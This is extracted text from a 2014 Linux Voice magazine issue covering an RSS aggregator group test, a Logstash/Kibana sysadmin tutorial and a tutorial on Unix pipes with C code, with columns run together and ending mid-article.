created just for the second type of               RSS (or with Reedah and TheOldReader)           article that contains the troublesome content
sharing. An OPML file is a plain text,            out of the box, and even with the others        to your main browser, which of course you will
hierarchical list of URLs of RSS feeds. All       it’s quite simple. Independent instances of     have already configured with all the plugins
the aggregators described here can                Tiny Tiny RSS may even directly link to         you need.
import and export such lists.                     each other in this way.
  With Newsbeuter, you need to pass it an             Liferea can save feeds to heaps of online
OPML file with the -i option the first time       communities; Newsbeuter can save
you run it, if you want to avoid complaints.      bookmarked articles to an external file or
Feeds in nested folders will get tags with        in your del.icio.us account. QuiteRSS sits
the same hierarchical structure.                  somewhere in the middle: its default
Newsbeuter also supports what is called           “share” menu has email, Evernote, Google
“OPML online subscription mode”: give it          Plus, Facebook, Twitter and a few other
the URLs of one or more OPML lists, and it        services. Tiny Tiny RSS has plugins for
will dynamically (re)load all the feeds they      sharing news via email or services like
contain every time you launch it.                 Flattr, Google+, Pinterest or Identica, but     QuiteRSS makes the best job of playing RSS
  In general, both single users and small         you may find it more convenient to use the      podcasts, but the others are also up to the task.
organisations can keep in synch, or               bookmarklets provided by those websites.
distribute, their newsfeeds using                                                                  VERDICT
combinations of the programs presented              VERDICT                                        Akregator
                                                                                                   Liferea
here. You and all your partners can enjoy           Akregator                                      Newsbeuter
                                                    Liferea                                        QuiteRSS
the greater speed and desktop integration           Newsbeuter                                     Tiny Tiny RSS
                                                    QuiteRSS
of a native aggregator on your computers,           Tiny Tiny RSS
and still access the same set of feeds



                                                                    www.linuxvoice.com                                                                55
     GROUP TEST RSS AGGREGATORS



News management                                     User interface
                                                    How will it fit my workflow?
Navigation, search, filters…

                                                    D
                                                            o you frequently print interesting         The boxes that follow try to give you a



T
          heoretically, a good RSS aggregator               news for offline reading?               very general idea of how each of the
          displays news when and how you                    Akregator, which integrates the         selected aggregators looks, feels and
          want, and enables you to browse very      KDE printing panel, may be the best             works under the hood. You should use
quickly. It also supports flexible classification   option. Need to process news with other         this information to figure out how each
of feeds and articles, as well as search and        tools? Go with Newsbeuter, which may be         tool would integrate with your own
filtering. In practice, some of these features      run within scripts, or Tiny Tiny RSS which      current Linux desktop and system
may be irrelevant for you. An avid reader who       can store everything into a database.           maintenance routines.
doesn’t care about archiving, for example,
would have little use for categorisation and
search interfaces.                                  Akregator
    Navigation is very simple in all aggregators.   Akregator is the main, if not the official      that makes the configuration tweaks that
Newsbeuter is the fastest, thanks to its textual    RSS aggregator of the KDE desktop.              people most frequently want easier to do:
interface and its many bandwidth-saving             Printing and integration with your Kontact      the commands to change fonts, font size
tricks. Tiny Tiny RSS is only as fast and           address book are incorporated within it.        and colours are very simple to find and
responsive as the link between its host             Depending on your taste, you may find its       use. Configuration of keyboard shortcuts
computer and your browser.                          default interface and layout dull or            is equally effortless. Even some less
    Liferea and Akregator provide the most          unobtrusive and efficient. While it’s hard to   common operations, like playing audio or
options for opening links: by themselves, or        remember its looks, or be impressed by          pop-up windows to signal the arrival of
passing them to new tabs or windows of              them, Akregator is also the RSS interface       more headlines, are self explanatory.
different browsers, with manual configuration
of browser invocation.
    QuiteRSS and Liferea seem the best ones
for search, with Akregator slightly behind. Our
personal preference goes to the search panel
of QuiteRSS: many (but not too many) options,
all packed in one very friendly panel.
                                                                                                                       Akregator shares the
    Tiny Tiny RSS has the barest search                                                                                look and feel of the rest
interface. While it seems that you may only                                                                            of KDE: solid, practical,
limit the search to fresh articles, it is also                                                                         simple. Even good
possible to type more options, like @{date} to                                                                         looking!
match by date, directly in the text input box.
However, with the right macros, scripts and
the will to set up and use them, Newsbeuter         Liferea
could beat all the others.                          Liferea was conceived as a Linux clone of       buttons and menus are even cleaner than
    All the contenders can organise feeds in        the FeedReader aggregator for Windows.          those of Akregator. Three layouts are
hierarchical trees and assign as many               By default the feed selection included          available: Normal, Wide (feeds, titles and
non-hierarchical tags or labels as you wish to      ranges from geek-only titles like Slashdot      content in parallel columns) or Combined,
each article (Tiny Tiny RSS also has limited        to music and comic blogs. At its bottom         which is the most compact. Should you
support for scoring). They also all have some       there are two very convenient folders: one      dislike the default colours and text
cache or archive, usable (except for Tiny Tiny      for all the news still unread and another       formatting, you may fix them all with a
RSS) even for offline reading. Liferea supports     for those marked as “Important”. Saved          couple of clicks, replacing the included
independent “News Bins” – permanent, static         news is readable in offline mode. The           CSS stylesheet with another you like best.
containers for articles that you want to keep.
The Akregator archive is the easier to
configure: with one or two clicks you can, on a
per-feed basis, disable archiving, or choose to
keep only articles marked “Important”.

 VERDICT
 Akregator
 Liferea
 Newsbeuter                                                                                                        Liferea’s ‘Normal’ look is even
 QuiteRSS
 Tiny Tiny RSS                                                                                                     cleaner and user friendlier
                                                                                                                   than Akregator, yet is quite
                                                                                                                   powerful.



56                                                         www.linuxvoice.com
                                                                                               RSS AGGREGATORS GROUP TEST

Newsbeuter
Whoever first called Newsbeuter “the Mutt
of RSS aggregators” is right. This program
                                                   Once you get used to it, Newsbeuter is
                                                really efficient. Type / to search for text,      Installation
feels like that console email client.           N to open the next unread article and ? to
   The default browser that displays the        list all the available commands. All the text     How do I get started?
articles is Lynx. With the exception of the     dialogs you use remain open for the whole



                                                                                                  T
layout, pretty much everything else can be      session: type V to see their list and reopen               hanks to how we selected the
changed in a few configuration files.           any of them.                                               applications for this Group Test, there
                                                                                                           is very little to say here about the four
                                                                                                  desktop applications: they should be available
                                                                                                  in the standard online repositories of most
                                                                                                  distributions derived from (at least) Debian,
                                                                                                  Ubuntu and Fedora. Just tell your usual
                                                                                                  package manager to get them. However, this
                                                               The feed headlines (front)
                                                               and the actual content of          may not always be enough.
                                                               each article (back) can use           Why? Because, while your browser and/or
                                                               completely different colour        your Linux box as a whole would surely have a
                                                               schemes in Newsbeuter.             way to play almost any audio or video around,
                                                                                                  your aggregator may not, unless you
                                                                                                  constructively mess with its configuration. If
QuiteRSS                                                                                          an important feed regularly includes
QuiteRSS uses the Qt toolkit and the            tree and rearranging columns as you wish.         multimedia content, check out in advance
WebKit rendering engine to run without          You can open single feeds or articles in          what its format is, and how your candidate
problems on Mac OS X, Linux, Windows            separate tabs, and configuring audio or           aggregator can handle it.
XP or later and OS/2. The interface is very     pop-up notifications for new articles is             Tiny Tiny RSS is an entirely different matter.
well organised, with just one exception:        almost as simple. The default categories          Tiny Tiny RSS is “compatible”, by definition,
the buttons that block banners with             and labels in the bottom left pane will be        with any format that your browser can handle.
AdBlock are almost invisible. That said, it’s   more than enough for most users, and              At the same time, this is the only package that
a snap to go full-screen, hiding the feed       adding your ones only takes a few clicks.         must be installed manually. The good thing is
                                                                                                  that it only takes one “techie” to make Tiny
                                                                                                  Tiny RSS available to all their friends, relatives
                                                                                                  or colleagues, whatever operating system they
                                                                                                  use. How? First, you must download the
                                                                                                  source code into a folder of any computer
                                                               An easy labelling system in
                                                                                                  equipped with a PostgreSQL or MySQL
                                                               plain view, number, order and
                                                               size of columns in the feed        database and web server. That computer
                                                               list changeable with a few         may be anything from your actual Linux
                                                               clicks. That’s QuiteRSS for        desktop to a web hosting account anywhere
                                                               you.                               on the planet.
                                                                                                     Next, create a database and database user
                                                                                                  for Tiny Tiny RSS (see the documentation for
Tiny Tiny RSS                                                                                     detailed instructions). Third, point your browser
Tiny Tiny RSS is slightly slower, and has a     that “server operating system” includes           to the folder where you had installed the
more limited interface than the other GUI       any Linux desktop. If all this isn’t enough,      software and follow the instructions. You will
aggregators presented here. However, it is      there is even an official Android client.         most probably have to change the permissions
also the most “portable” aggregator             Even without plugins, you get hierarchical        and/or ownership of some sub-folder, but that
around. The software itself will run on         feed display with user-configurable               is pretty much it. After a few clicks, you will be
pretty much any server operating system         categories and labels, scoring,server-side        able to enter your Tiny Tiny RSS installation as
around, while the UI works on any browser       archive, and three different access levels:       administrator and create new users. Even if
that can handle JavaScript. Please note         user, power user and administrator.               you will be the only user of your Tiny Tiny RSS,
                                                                                                  however, do create a separate account for your
                                                                                                  daily usage, to avoid messing up the general
                                                                                                  configuration by mistake.

                                                                                                   VERDICT
                                                               A themeable Web interface           Akregator
                                                               accessible from any browser,        Liferea
                                                               or through an associated            Newsbeuter
                                                                                                   QuiteRSS
                                                               Android client – it’s hard to       Tiny Tiny RSS
                                                               be more portable than Tiny
                                                               Tiny RSS.



                                                              www.linuxvoice.com                                                                57
     GROUP TEST RSS AGGREGATORS


Automation & plugins
What’s the point of software, if it doesn’t work for you?


C
         ollection and processing of           automatically with other programs
         news with Free Software can be        through the DBUS interface.
         much more powerful and                   Liferea can also use RSS feeds even
efficient (in one word: fun) than you          for websites that don’t provide one, by
may expect.                                    scraping their content and reformatting
   The filtering system of QuiteRSS is         it as an RSS feed. It is possible to
(much) more limited than the others,           configure the program to launch a
but much simpler to use. Feeds or              script that does this, or tell it to run a
articles matching the user-defined             postprocessing filter. We highly             Liferea can scrape the content of websites into an RSS
conditions can trigger actions such as         recommend the first approach, which          format even if that site doesn’t have an RSS feed.
adding tags and labels to them, or play        would be reusable with any other
sounds. Akregator is more or less in the       aggregator.                                                 displayed, while others handle feed
same situation.                                   SnowNews, an aggregator that for                         redirectors, authentication through
   Newsbeuter supports both macros             several reasons we couldn’t include in                      external services and extensions for
and any external software that either          this Group Test, has an online                              download and automatic reformatting
outputs a correct RSS feed by itself, or       repository of feed processing scripts,                      of non-standard feeds, from Scientific
converts the content of whatever Web           together with instructions to write your                    American to National Geographic.
page Newsbeuter passed to it to the            ones, at http://kiza.kcore.de/software/                        Last but not least, databases: Tiny
same format: press the comma key               snownews/snowscripts. Those scripts                         Tiny RSS relies on a MySQL or
followed by a string to execute the            can be used also by Liferea and                             PostgreSQL backend, Newsbeuter and
macro defined with that name in the            Newsbeuter to do things like removing                       Liferea on SQLite. Akregator, if archiving
configuration file, or | to pipe the text of   advertising and other graphics from                         is enabled, does it with Metakit.
the current article to any other program.      web pages, or downloading Twitter
   Liferea comes with two plugins              timelines and Wikipedia watchlists.                           VERDICT
installed: a music and video player, and          No, we haven’t forgotten Tiny Tiny                         Akregator
                                                                                                             Liferea
an interface for the Gnome Keyring             RSS: its plugin configuration panel lists                     Newsbeuter
                                                                                                             QuiteRSS
password manager. If that isn’t enough,        dozens of extensions. Some just                               Tiny Tiny RSS
you can make Liferea interact                  simpllify how certain feeds are




Documentation
How do I do that?


A
          kregator and QuiteRSS have           friendly enough that you won’t need to
          maybe the smallest and               study anything to get started and
          poorest documentation sets of        perform most tasks, it comes with a
the group. Truth be told, they also are        good Help menu that links to the FAQ, a      The Liferea Help menu (top right) points to everything you
the programs that need it less: you can        Quick Reference Tutorial and to a good       need to know to use the program. So do the links embedded
figure out by yourself practically             manual. The latter explains, among           in many forms of Tiny Tiny RSS
everything you might have to do just by        other things, how to update feed
clicking around.                               subscriptions, use News Bins and                            That’s why we strongly suggest
   The same may be said for the                manage enclosures and podcasting.                           reading the “Why NewsBeuter” text
end-user part of Tiny Tiny RSS. The            The official Liferea blog (http://lzone.                    (http://newsbeuter.org/doc/
administration side is more complex, of        de/liferea/blog) is another good source                     newsbeuter.html#_why_newsbeuter).
course, but the documentation is               of information.                                             It will give you a good overview of what
adequate, including the parts about the           Newsbeuter has the most exhaustive                       is possible, and maybe even ideas on
installation and the variables in the          documentation of the pack. Every                            how to use the other aggregators.
configuration file. Besides, the forms for     option and configuration variable is
several tasks include direct links to the      described in detail on the website.                           VERDICT
corresponding parts of the manual.             Which is good, because Newsbeuter                             Akregator
                                                                                                             Liferea
   Liferea is the best from this point of      does so much that you could never                             Newsbeuter
                                                                                                             QuiteRSS
view, at least for ordinary users without      figure out how to get the most out of                         Tiny Tiny RSS
advanced needs. While still being              this aggregator by simply using it.



58                                                              www.linuxvoice.com
                                                                                            RSS AGGREGATORS GROUP TEST




  OUR VERDICT
RSS Aggregators
D
          eciding the winner of this     posts and threads in blogs and            Liferea is the best compromise between simplicity and features.
          Group Test was hard.           fora) will find themselves doing
          Objective evaluation of
features and defects of each
                                         those things in their main browser,
                                         to reuse cookies if nothing else.
                                                                                    1st Liferea
                                                                                    Licence GPLv2+ Version 1.10.8
contender clashed, we confess,              The same is true for everybody
with our strong, but personal            who wants to bookmark and                  http://lzone.de/liferea
opinion of where the web and its         categorise the web pages they get          Liferea is fast, has all the main features, can be extended in
users should go, and how.                via RSS. Why keep two separate             many ways and installation is dead easy. That’s why it wins.
   This, they say, is the age of Cloud   tagging and bookmarking systems?
Computing, that is of software that      This, for the record, is the reason        2nd Tiny Tiny RSS
runs “in the cloud”, on a remote         why we didn’t pay more attention to        Licence GPLv3 Version 1.12
server, somewhere else. If that is       labelling, scoring and so on.
true, it had better be your cloud –         In other words, if all your             http://tt-rss.org/redmine/projects/tt-rss/wiki
Free Software that you install and       RSS-related activity and indexing          It’s slow and its interface isn’t really state of the art. However, it
run on a server you can trust –          would have to happen inside a              is the most portable and future-proof of the pack. Give it a try.


“The only contender here, never mind the                                            3rd QuiteRSS
winner, should be Tiny Tiny RSS.”
                                                                                    Licence GPLv3 Version 0.15.4

                                                                                    http://quiterss.org
                                                                                    Do you need to categorise and label all your news, just as you
shouldn’t it? By this line of            browser anyway, why not even read
                                                                                    want? This is the aggregator for you.
reasoning, the only contender here,      the feeds with the same browser?
never mind the winner, should be           At the same time, we
Tiny Tiny RSS. It is made to work        acknowledge that most people will          4th Newsbeuter
exactly in that way, and it even has     not need a full-fledged Web based          Licence MIT Version 2.8
an Android client, so why should         system, especially if it is slower
                                                                                    http://newsbeuter.org
you ask for more?                        than native desktop programs. At
                                                                                    If you have the time to learn all its possibilities, Newsbeuter
   Well, there are two other reasons     that point, the choice is simple.          can be the most efficient and flexible aggregator around.
to prefer Tiny Tiny RSS, which are       Newsbeuter is fast and extremely
much more objective than the one         powerful, but has the steeper
above, but do not apply to               learning curve. Akregator is simple
                                                                                    5th Akregator
everybody.                               and practical, but relatively limited.     Licence GPLv2 Version 4.12.5
   People who use RSS mostly to          QuiteRSS is full featured and              www.kde.org
find and play multimedia content, or     portable, but not the best in terms        Akregator lacks the plugins of Liferea, but is so simple and solid
participate in online activities (for    of plugins and documentation. So,          it may be all you need.
example, commenting on new               you guessed it, Liferea wins.




  YOU MAY ALSO WISH TO TRY…
  You should also try SnowNews if command-         rawdog.html): give it a feed, and it will           downloads and assembles different feeds
  line tools are for you, or RSSOwl for a          produce a static HTML page with all the             into a new, combined one. It’s also relatively
  graphical interface: it is multiplatform and     corresponding articles. The Python module           simple to create an RSS feed from any text
  even runs as an Eclipse plugin.                  called feedparser is already used for many          input. The script at http://ocsovszki-dorian.
     There is also plenty of Free Software that    tasks of this kind, and well documented.            blogspot.it/2011/01/generating-rss-feed-
  can download, generate or otherwise process        Even on the opposite side, that is feed           width-bash-script.html, for example, creates
  RSS feeds automatically. An example of such      generation, there are plenty of choices. Try        feeds for torrent clients, and is easy to study
  category is Rawdog (http://offog.org/code/       Planet (www.planetplanet.org), which                and adapt to other cases.




                                                              www.linuxvoice.com                                                                             59
     SUBSCRIBE




SUBSCRIBE            shop.linuxvoice.com

Not all Linux magazines are the same
                                                                        Introducing Linux Voice,
                                                                        the magazine that:
                                                                          Gives 50% of its profits
                                                                        back to Free Software
                                                                          Licenses its content
                                                                        CC-BY-SA within 9 months

                                                                        12-month subs prices
                                                                        UK – £55
                                                                        Europe – £85
                                                                        US/Canada – £95
                                                                        ROW – £99

                                                                        7-month subs prices
                                                                        UK – £38                                            DIGITAL
                                                                        Europe – £53                                        SUBSCRIPTION
                                                                        US/Canada – £57                                     ONLY £38
                                                                        ROW – £60


          Each month Linux Voice includes 114 pages of in-depth tutorials,
              features, interviews and reviews, all written by the most
                      experienced journalists in the business.
               Payment is in Pounds Sterling. 12-month subscribers will receive 12 issues of Linux Voice a year. 7-month
            subscribers will receive 7 issue of Linux Voice. If you are dissatisfied in any way you can write to us to cancel your
                      subscription at subscriptions@linuxvoice.com and we will refund you for all unmailed issues.



60                                                        www.linuxvoice.com
                                                                                                                                         NEXT MONTH



                                 NEXT MONTH IN



                                                                                          EVEN MORE AWESOME!
ON SALE
THURSDAY                                                                                                                                    More Turing!
                                                                                                TURING AGAIN
31 JULY                                                                                                                                     British computing
                                                                                                                                            was once streets
                                                                                                                                            ahead of the rest of
                                                                                                                                            the world, thanks to
                                                                                                                                            Alan Turing and the
                                                                                                                                            Manchester MK II.
                                                                                                                                            We should celebrate
                                                                                                                                            this fact a lot more…

                                                                                                                                            Fork off!
                                                                                                                                            Free software is all
                                                                                               TURING AGAIN                                 about choice – and
                                                                                                                                            that includes the
                                                                                                                                            choice of the
                                                                                                                                            developers to branch
                                                                                                                                            out on their own.
                                                                                                                                            Find out why and
                                                                                                                                            how they do it.

                                                                                                                                            Slackware

RASPBERRY PI PROJECTS                                                                                                                       Get your hands dirty
                                                                                                                                            with a peek under
                                                                                                                                            the hood of
It’s summer, so that means staying in out of                                                                                                Slackware – the
the rain and hacking up a heap of fun with a                                                                                                oldest, purest and
                                                                                                                                            some would say
Nerf gun, a Raspberry Pi and a Robot arm.                                                                                                   awesomest Linux
Local wildlife, be very afraid…                                                                                                             distro around.




       LINUX VOICE IS BROUGHT TO YOU BY
Editor Graham Morrison           Editorial consultant Nick Veitch                through the use of advice in this magazine.   Copyright Linux is a trademark of Linus
graham@linuxvoice.com            nick@linuxvoice.com                             Experiment with Linux at your own risk!       Torvalds, and is used with permission.
Deputy editor Andrew Gregory                                                     Distributed by Marketforce (UK) Ltd, Blue     Anything in this magazine may not be
andrew@linuxvoice.com            All code printed in this magazine is licensed   Fin Building, 110 Southwark Street, London,   reproduced without permission of the editor,
Technical editor Ben Everard     under the GNU GPLv3                             SE1 0SU                                       until March 2015 when all content (including
ben@linuxvoice.com                                                               Tel: +44 (0) 20 3148 3300                     images) is re-licensed CC-BY-SA.
Editor at large Mike Saunders    Printed in the UK by                                                                          ©Linux Voice Ltd 2014
mike@linuxvoice.com              Acorn Web Offset Ltd                            Circulation Marketing by Intermedia Brand     ISSN 2054-3778
Creative director Stacey Black                                                   Marketing Ltd, registered office North Quay
stacey@linuxvoice.com            Disclaimer We accept no liability for any       House, Sutton Harbour, Plymouth PL4 0RA       Subscribe: shop.linuxvoice.com
                                 loss of data or damage to your hardware         Tel: 01737 852166                             subscriptions@linuxvoice.com

                                                                    www.linuxvoice.com
     SYSADMIN




SYSADMIN
System administration technologies brought to you from the coalface of Linux.

                       Jonathan Roberts
                       dropped out of an MA
                       in Theology to work
                                                Logstash
                       with Linux. A Fedora     Understand the troves of information gathered by your logs.
                       advocate and systems



                                                L
                       administrator, we hear
                                                        ast issue, we talked about why logs           today, provides a repository for Logstash
                       his calming tones
                       whenever we’re stuck             are important and offered a brief             and Elasticsearch, details of which are on its
                       with something hard.             introduction to collecting logs with          website (www.elasticsearch.org/blog/
                                                syslog. This month, we want to take you a             apt-and-yum-repositories).
 When it comes to troubleshooting, there’s      few steps beyond those basics and                        Once you’ve installed the package, start
 no substitute for knowing how the              introduce a log management solution.                  the Elasticsearch server with service
 components of your system actually work.
                                                   There are plenty of options out there,             elasticsearch start or equivalent.
 That said, there are some common steps
                                                including the very well regarded Splunk, but             Kibana has no package, but since its
 that you should take every time you sit
 down to solve a problem, and it doesn’t        we’ll be looking at one of the main open              latest incarnation is just a collection of
 hurt to have an occasional refresher. So       source options – Logstash. It accepts input           HTML and JavaScript files, installation isn’t
 let’s do just that: First, make sure you       (log entries and other kinds of events) from          too complicated:
 understand the problem – be able to            many sources, stores them in a searchable                Install a web server (httpd)
 describe what should be happening, what        back-end, and then enables you to query all              Download Kibana (https://download.
 is happening and why this is wrong.            that information through a web interface.                elasticsearch.org/kibana/kibana/
    If a user comes to you and says their          In short, Logstash helps you to actually              kibana-3.1.0.tar.gz)
 VPN connection is broken, you should not       use your logs and gain valuable operational              Extract the files to your document root
 start by looking at their VPN logs, but        insights from them.                                      We’ll be running Kibana on the same
 instead ask “can you show me what you
                                                   In this month’s issue, we’re going to show         server as Elasticsearch, so you shouldn’t
 were trying to do when you found the
                                                you how to set up Logstash in conjunction             need to make any changes to its
 problem?”. Nine times out of ten, they’ll
 show you what happens as they try to           with Elasticsearch, a storage backend, and            configuration.
 connect to a remote box with SSH or            Kibana, a fancy web interface which will help            With all that in place, you should be able to
 through a web browser and you’ll               you query your data without learning the              go to your Kibana installation in a web
 reformulate the problem – “why can’t the       ins-and-outs of Elasticsearch.                        browser and see the Kibana welcome page.
 user connect via SSH to devbox1.test?”.                                                              If you don’t see a black page, Kibana isn’t
    Once you understand the problem, you        Getting started                                       installed properly – check your httpd
 can begin to think about solving it. Learn     The first job, as ever, is to install all the         configuration – and if you see a red bar
 which log files are important, how you can     components. Elasticsearch, the company                saying ‘Couldn’t connect to Elasticsearch’ -
 increase their verbosity and how to read       behind all three components we’re looking at          check the service is running.
 them carefully. Too many times, I’ve failed
 to solve a problem only to ask a colleague
 for help, at which point they look in the
 same log file I just did and spot the
 problem straight away.
    Now you can formulate some
 hypotheses about what the cause could
 be. Write these down and come up with a
 way to test each one. Finally, work through
 all your hypotheses, testing one at a time,
 and only changing one thing at a time,
 until you find the answer. If you get
 through all of them without finding the
 answer, then you need to go back and
 make sure you understood the problem
 correctly and come up with new
 hypotheses. You are a philosopher.
                                                Kibana is an excellent web interface that makes it really easy to query your log data in
                                                Elasticsearch – even managers can understand it!



62                                                           www.linuxvoice.com
                                                                                                                                           SYSADMIN

  Now we have a way to inspect our data
without having to learn the ins-and-outs of
the Elasticsearch API let’s get some data in
to Logstash and check everything is working
as expected.

Getting your data
First, let’s test Logstash in the simplest way
possible:
cd /opt/logstash java -jar ./logstash.jar agent -e
‘input { stdin { } } output { stdout { } }’
  That command will start the Logstash
process, accepting input from stdin and
sending its output to stdout, rather than
Elasticsearch. After running this, type                  Logstash is just one component of the Elasticsearch, Logstash and Kibana stack – but it does have
anything you like into the console and you               the coolest logo of them all, which is why we’ve included it in the screenshot.
should see a structured reply from Logstash
indicating that everything worked OK. (The               input, modifying them in some way, before            anything that matches the
-e argument simply lets you pass a                       they get stored by the output plugin. For            COMBINEDAPACHELOG pattern (the default
configuration file on the command line –                 example, with the Grok filter you can take           format used in httpd.conf) and mapping it to
you can easily put this configuration in                 any plain text file, such as an Apache or            the message field.
/etc/logstash/conf.d.)                                   MySQL log file, and map regular expression             Finally, the output:
  If all works, let’s stop using stdout for the          matches to fields. This lets you split your          output { elasticsearch_http { host => localhost }
output and instead use Elasticsearch:                    output into separate, searchable fields,             stdout { } }
java -jar ./logstash.jar agent -e ‘input { stdin { } }   making it much easier for you to answer                 While this may look familiar, notice that
output { elasticsearch_http { host => localhost } }’     questions like ‘do we get more 500 errors in         we’ve included two output plugins. Logstash
  If you now type hello linux voice into the             summer than winter?’.                                will send the result of the filter to both
console and then refresh your Kibana                        Grok comes with lots of common patterns           standard output and Elasticsearch, making
window, you should see your message                      already defined, so you rarely even have to          it a bit easier to debug.
logged towards the bottom of the page.                   write the regular expressions yourself. You             Put those three sections into a
We’re making great progress!                             can find the list of included patterns at            configuration file and start Logstash with
                                                         https://github.com/elasticsearch/                    the -f option, passing it the location of the
Logstash end to end                                      logstash/blob/master/patterns/grok-                  configuration file. Once Logstash has
Let’s look at the three main parts of                    patterns.                                            started, go to Kibana and refresh. As you
Logstash configuration: inputs, filters and                                                                   browse around Kibana, you should find new
outputs. Inputs and outputs you’ve met                   More inputs                                          log entries being recorded.
already. These blocks simply define where                There are loads of input, filter and output
input will come from and where you want to               plugins available for Logstash, but for a            Kibana
store it. In each section, you specify which             clearer example, let’s look at a configuration       Now you’ve actually got some logs being
plugins you want to deal with your input or              file that would allow you to parse an Apache         stored, you can use Kibana to start asking
output (such as stdin, file, elasticsearch_              log file. First, the input:                          questions of that data.
http etc) and pass any parameters to                     input { file { path => ‘/var/log/httpd/access_log’       By default, most of the Kibana interface is
configure the plugin as you wish. Filters are            start_position => beginning } }                      filled with a large graph. As your data makes
more interesting. These get applied to the                 Here, we’re specifying the default Apache          its way in, this graph will fill up with bars
                                                         access log as the input to Logstash. If you          representing activity at different points in
                                                         point this at the log file for your Kibana           time. You can click and drag on the graph to
   Logstash beyond logs                                  installation, you can use Logstash to track          zoom in and get a higher resolution look at a
                                                         Kibana usage. By giving the start_position           particular moment in time.
   As system administrators, we immediately think
   about how Logstash can be used to help us             parameter, Logstash will look through the                You can also click the View button in the
   make use of the mountains of syslog data we’re        whole of the file, enabling you to analyse           top-left of the graph to adjust what kind of
   all storing, but it can be just as useful for         historical data, before operating more like          chart is drawn, over what period the data is
   developers who are trying to build more               the tail -f command, appending new input             sampled at and much more besides.
   intelligent businesses.
                                                         as it arrives.                                           Above the chart is the Query bar, where
       For instance, if you’re running a large retail
   company, you could easily use the TCP input to          Next, the filter:                                  you can enter relatively free-form patterns to
   keep track of product sales – every time a            filter { grok { match => { ‘message’ =>              search for in the data. Enter an IP address,
   product is sold, have your point of sale              ‘%{COMBINEDAPACHELOG}’ } } }                         and it will filter all matching results.
   terminals send a message to your Logstash                This time, we’re using the Grok filter            There’s so much you can do with Kibana.
   server, and it will index the data, graph it and
                                                         plugin. The match parameter does the work            We’d love to hear how you’re using Logstash
   help your management teams spot and quickly
   respond to emerging trends.                           of mapping a regular expression match to a           on your systems, so please drop us a line if
                                                         field name – in our example, we’re taking            you’re using it!



                                                                       www.linuxvoice.com                                                                         63
      CORETECHNOLOGY




                                  CORE
A veteran Unix and Linux
enthusiast, Chris Brown has
written and delivered open
source training from New Delhi
to San Francisco, though not on
                                  TECHNOLOGY
the same day.                     Dive under the skin of your Linux system to find out what really makes it tick.

Pipes, shell scripting, and a little bit of C
The most fun you can have with a pipe without actually putting tobacco in it.


N
           estled in the bottom-left corner of     (approximately) what the shell does if I enter       stage 1 of the diagram on page 65. At line 8
           my laptop’s keyboard is a key with      the command ls | sort -r :                           we create a child process which is destined
           two straight lines on it – a slopey     1. #include <unistd.h>                               to become the downstream program. (I
one and a vertical one. The vertical line          2.                                                   discussed fork() in detail last month.) At line
goes by various names – a stick, a poley or        3. void main()                                       10 we connect the standard input of this
just “vertical bar”. It finds use as the logical   4. {                                                 process (descriptor 0) to the downstream
‘OR’ operator in various languages, and is         5. int p[2];                                         end of the pipe (p[0]). Then at line 12 this
sometimes used in great numbers in ASCII           6.                                                   child program executes the sort program to
art. But in the world of the Linux command         7. pipe(p);       /* Create the pipe */              do a reverse sort. We don’t supply a filename
line it is most often called a pipe.               8. if (fork() == 0) {                                argument, so (like any well-behaved filter
   Now we all know how to construct a              9. /* Downstream child: connect stdin to pipe */     program) sort will read from its standard
pipeline on the command line, and (roughly)        10. dup2(p[0], 0);                                   input. The sequence at lines 14–19 is similar
how it works. A simple command such as             11. close(p[1]);                                     – we create the upstream child, connect its
ps -e | wc                                         12. execlp(“sort”, “sort”, “-r”, (char *)0);         standard output to the upstream end of the
runs the two programs ps and wc                    13. }                                                pipe, and execute ls. Now we’re at stage 3
concurrently, with the output from ps              14. if (fork() == 0) {                               of the diagram. All that is left for the parent
appearing as the input of wc.                      15. /* Upstream child: connect stdout to pipe */     to do (line 22) is to wait for its two children
   Pipes involve an upstream process               16. dup2(p[1], 1);                                   to finish.
(the producer of data) and a downstream            17. close(p[0]);                                        Closing the unused descriptors on the
process (the consumer), and the pipe               18. execlp(“ls”, “ls”, (char *)0);                   upstream end of the pipe in the downstream
imposes a loose synchronisation between            19. }                                                child (line 11) and in the parent (line
the two. If the pipe becomes full, the             20. /* Parent: wait for both children */             21) is important. If we don’t do this, the
upstream process will block if it tries to         21. close(p[0]); close(p[1]);                        downstream child will never see an EOF
write; if the pipe is empty, the downstream        22. wait(); wait();                                  (“End Of File”) when it reads from the pipe,
process will block if it tries to read.            23. }                                                and will just hang there on the assumption
   It is this simple mechanism for combining       There isn’t really that much code here, but          that one of the processes with an open
two programs, together with the large              it’s perhaps not obvious what’s going on, so         descriptor might write some more data. The
collection of programs that deal with input        let me explain:                                      first time I wrote code like this, which is a
and output streams consisting simply of                                                                 fair few years ago now, I remember being
lines of text (in preference to binary formats)    Behind the scenes in the pipe factory                caught out by this. Notice that the are no
that facilitates the “tool building” approach      The system call at line 7 creates a pipe. We
that makes the command line so powerful.           supply a little array of integers to this call (p)
   Like last month, I’m going to inflict a few     and in it we get back two file descriptors, one
                                                                                                          Try It Out
lines of ‘C’ code on you so that you can see       on the upstream end ([p1]) and one on the              Find the named pipes on your system
how pipes work behind the scenes. This is          downstream end (p[0]). This corresponds to             sudo find / -type p
                                                                                                          /var/spool/postfix/public/qmgr
“Pipes involve an upstream process and a                                                                  /var/spool/postfix/public/pickup
                                                                                                             You may get different results depending
downstream process, and the pipe imposes a                                                                on what Linux distro you’re running and what
                                                                                                          packages you have installed, but I would be
loose synchronisation between the two.”                                                                   willing to bet that you don’t find very many.




64                                                              www.linuxvoice.com
                                                                                                                             CORETECHNOLOGY


  Try It Out
  Your very own named pipe
  For this demonstration, set up two terminal
  windows side by side on your desktop. In one of
  the windows, begin by creating a named pipe.
  The command is mkfifo (and not, as you might
  reasonably guess, mkpipe):
  $ mkfifo /tmp/demopipe
     Verify that it exists:
  $ ls -l /tmp/demopipe
  prw-rw-r-- 1 chris chris 0 Apr 1 17:21 /tmp/
  demopipe
      Now, in the left-hand window type
  $ cat > /tmp/demopipe
  and in the right-hand window type
  $ cat < /tmp/demopipe
      Now type a few lines of text into the left-hand
  window. What you type is written to the pipe by
  the “left” cat. In the right window you’ll see the
  output of the “right” cat echoing what you typed
  onto the screen. To quit the experiment, enter
  Ctrl+D (your “end of file” character) into the left
  window. The left cat will terminate, closing the
  upstream end of the pipe. The right cat, as it
  tries to read from the pipe, notices that it has
  been closed, and exits.
                                                        Pipes in the making: a note from one of the founding fathers of UNIX, Doug McIlroy, dated October
                                                        1964, suggests “ways of coupling programs like garden hose”.


read() or write() calls corresponding to stage          script. Here’s an example of piping out of a         4. i=0
